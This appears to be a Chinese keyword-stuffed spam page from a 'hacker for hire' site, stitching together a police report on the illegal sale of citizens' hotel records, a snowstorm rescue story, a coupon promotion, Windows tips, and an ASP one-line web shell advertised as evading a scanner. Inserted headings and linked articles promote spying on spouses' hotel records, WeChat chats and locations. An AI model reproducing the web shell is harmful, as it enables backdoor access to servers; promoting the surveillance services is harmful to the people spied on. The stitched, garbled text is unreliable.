与大多数只从事破坏和恶作剧的“ *** 恐怖黑客”不同,黑客高手几乎没有攻击行为。黑客高手还一再强调黑客“保护用户数据”,不更改密码,甚至试图控制这种行为的负面影响。
例如,在2008年指纹事件后,黑客高手一再警告手机用户生物识别 *** 的弱点,打破了“老母亲”保护用户隐私的心。
黑客高手似乎只是想给那些忽略了这一点的企业和 *** 机构一个警告
(接单平台)
怎么查老公开房记录?怎么查我老公开过房。只要你付钱,你不仅可以随意查看别人的银行账户,还可以查看私人信息,比如房间开门记录和手机位置。7日,湖北警方报告称,根据相关线索,警方发现了一家涉嫌在网上出售和交易个人信息的“商业咨询”公司,并成功逮捕了8名涉案嫌疑人。
只要你付钱,你不仅可以随意查看别人的银行账户,还可以查看私人信息,比如房间开门记录和手机位置。7日,湖北警方报告称,根据相关线索,警方发现了一家涉嫌在网上出售和交易个人信息的“商业咨询”公司,并成功逮捕了8名涉案嫌疑人。
怎么查老公开房记录
经过调查,该公司以“商业咨询”的名义,在过去两年中通过 *** 和微信多次购买和重新发送了30多万条公民个人信息,非法获利超过18万元。记者追踪了相关信息。
“商业咨询”公司随意寻找商业“住房开业记录”
吴某在湖北省保康县经营山货业务多年,最近发现了一家特殊的“商务咨询”公司。
今年6月,吴某无意中建立了一个名为“富勒姆商业咨询中心”的网站。它的页面宣称,它可以进行商业调查、寻找人和地址、婚姻调查等。
"检查记录多少钱?"吴某问。
"一次1200元. "对方回答道。
考虑到 *** 欠了两万元后失去了合同,吴某认为如果他能找到 *** 开房子的记录,他可能会发现自己在路上,不得不偿还债务。因此,第二天,吴某再次联系了那个人,另一方通过短信发送了一个银行卡号码,说他会在赚钱后帮他核对。
吴某转移了钱,并提供了周的身份证号码。
两个多小时后,另一方加入了吴某 *** 好友,并发送了4张截图。这张截图显示了周自2014年10月以来的94个房间的开放记录。
另一方还声称,只要增加额外的资金,就可以找到银行信息、手机位置和其他信息。
“如果你给钱,可以查看任何信息,那么就不会有个人隐私。这是非法的吗?”经过反复考虑,吴某向湖北省保康县公安局 *** 安全大队报案。
警方参与调查以揭露“商业咨询”的真相
怎么查我老公开过房
与此同时,当吴某举报此案时,湖北省襄阳市公安局 *** 安全支队也在检查中发现,“燃料城商务咨询中心”涉嫌在网上销售公民个人信息。为了查明情况,保康县公安局 *** 安全大队被指定立案调查。
调查此案的警方开始调查,同时通过吴某与张艺谋联系,了解他们的业务范围以及各种交易业务和信息。
初步调查显示,张先生已经在“富邦商务咨询中心”注册,并公布了业务范围,包括企业信用调查、商务调查、债务结算、防伪和权利保护、寻找人和地址、婚姻调查等。2012年,张因非法获取公民个人信息被警方拘留了10天。
经过进一步调查,警方获得了相关证据,证明张艺谋通过 *** 和微信向他人购买了32次公民个人信息,并以高价出售,并逮捕了张艺谋。
之后,警察去了山东、四川、河南等地,逮捕了八名嫌疑人,包括杨和葛。
信息“转手卖出”赚取差价“码字”交易隐藏了人们的耳目
这是一家“商业咨询”公司,你为什么经常出售个人信息?你是怎么得到这些信息的?
调查人员称,根据张的说法,“富勒姆商业咨询中心”只是其业务的掩护,实际上是为了盈利而出售公民的个人信息。张先生有多种渠道联系和购买信息。
(接单平台)
1.一男子听说家乡下雪后雪景很美,于是带着家人从深圳开着宝马车回老家湖北枣阳看雪,不料途径随县时地图导航误入荒山野岭,半夜凌晨被困在冰山雪路中。随县公安局新街派出所民警连夜救助,通过微信定位成功找到迷路的男子及其家人和车辆,助其平安回家。
微信定位找人
2.11月26日晚23时50分许,新街派出所接到一说着枣阳口音男子的报警,称其小轿车被困在随县黑屋湾水库附近的山坡上,车轮陷入冰雪地里不能动弹,很容易滑下山,车内还有老人和小孩,周围荒山野岭,四处无人,十分害怕,请求救援。
免费微信定位追踪
4.民警阳俊、辅警杨太东利用微信共享位置通过高德地图导航,开着警车来到河源店村附近,由于大雪封山,路面结冰,打滑严重,且山路崎岖,阳俊和杨太东将警车停靠在村子路边,徒步10多公里路,于27日凌晨4时许,在随县黑屋湾水库附近河源店村上泉水冲湾一山坡上,找到马某及其家人和车辆。熟悉路况的辅警杨太东开着马某的小轿车,在民警阳俊的指挥下,慢慢将车轮挪出雪地,开出山坡,来到警车停放的附近。随后,马某开着小车带着家人,在警车的带领下,驶离荒山野岭。民警阳俊和辅警杨太东开着警车,将马某带入316国道,看着马某从316国道驶回枣阳,才调头回到派出所,此时已经凌晨5时30分许。
手机微信定位判断位置
据了解,马某在深圳经商,刚新买一辆宝马车,听说老家湖北枣阳下雪,于是驾车带着母亲、老婆和小孩想回家看雪景,他们从随县安居镇高速出口下高速后走低速,因不熟悉路,地图导航误入险境被困。
马某临走时十分感动,连声向民警道谢,并通过微信发红包给民警阳俊以表示感谢。阳俊婉言谢绝,他说:“济危扶困是人民警察义不容辞的责任,是我们的工作职责所在,这是我应该做的。”
(接单平台)
2月16日重新置顶 每个月都可以领
仅限制有优酷会员的可参与
输入手机号码领取->再点右上角我的奖品
复制兑换码->点立即使用兑换即可->喜欢K歌的上
活动地址:
asp一句话
php一句话
aspx一句话
可以躲过雷客图的一句话。
<%
set ms=server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。
提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。
不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。
此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。
第二招:巧妙隐藏硬盘
在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。
原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。
接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。
如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”。
将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“()”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d: upian upian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。
当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。
*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0
*usingthefile%THISDIRPATH%\folder.htt.
保存并退出,按“F5”键刷新一下,是不是很有个性接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。
第三招:禁用“开始”菜单命令
在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动WindowsXP组策略编辑器。
相关文章
新电商法个体营业执照哪里办,电商营业执照要交税吗
不论是啥店面在店内都是会挂上自身的企业营业执照,它是针对线下门店言则。可是如今伴随着时期的发展趋势,许多的个人店家都是会在网络上开启了店面。那麼电子商务的企业营业执照在哪儿办呢?电子商务的企业营业执照...
怎么查老婆微信聊天记录(怎样可以接收老婆微信聊天记录)
有什么可以做的,只必须下载应用,随后在后台管理键入她的微信号码,你也就能够即时查询微信信息,手机软件能够远程演示,大家精英团队想要回应你的疑惑,还有你搞不懂的地区。问吧, 我能在手机上见到我妻子的微信...
黑客是通过什么进入微信(微信黑客高手联系方式)-翼课网被黑客攻击
黑客是通过什么进入微信(微信黑客高手联系方式)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑...
黑客军团剧照(黑客军团讲的是什么)
本文导读目录: 1、有哪些好看的美剧推荐 2、如何评价美剧 《黑客军团》 3、哪位大神有黑客军团第二季2016年上映的由 拉米·马雷克主演的百度云资源 4、美剧《黑客军团》的资源谁有...
想过夜电话联系_信阳姑娘质量好的场子微信
沈梦辰自曝倒追海涛细节...
B2B,B2C,B2B2C,O2O,C2B是什么意思?五分钟看懂
哈罗,大家好,我是司瓦图老张。今天跟朋友们分享下B2B,B2C,B2B2C,O2O,C2B等都是什么意思,以及他们之间有什么区别。 一、B2B,B2C,B2B2C,O2O,C2B,C2C都是什么...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!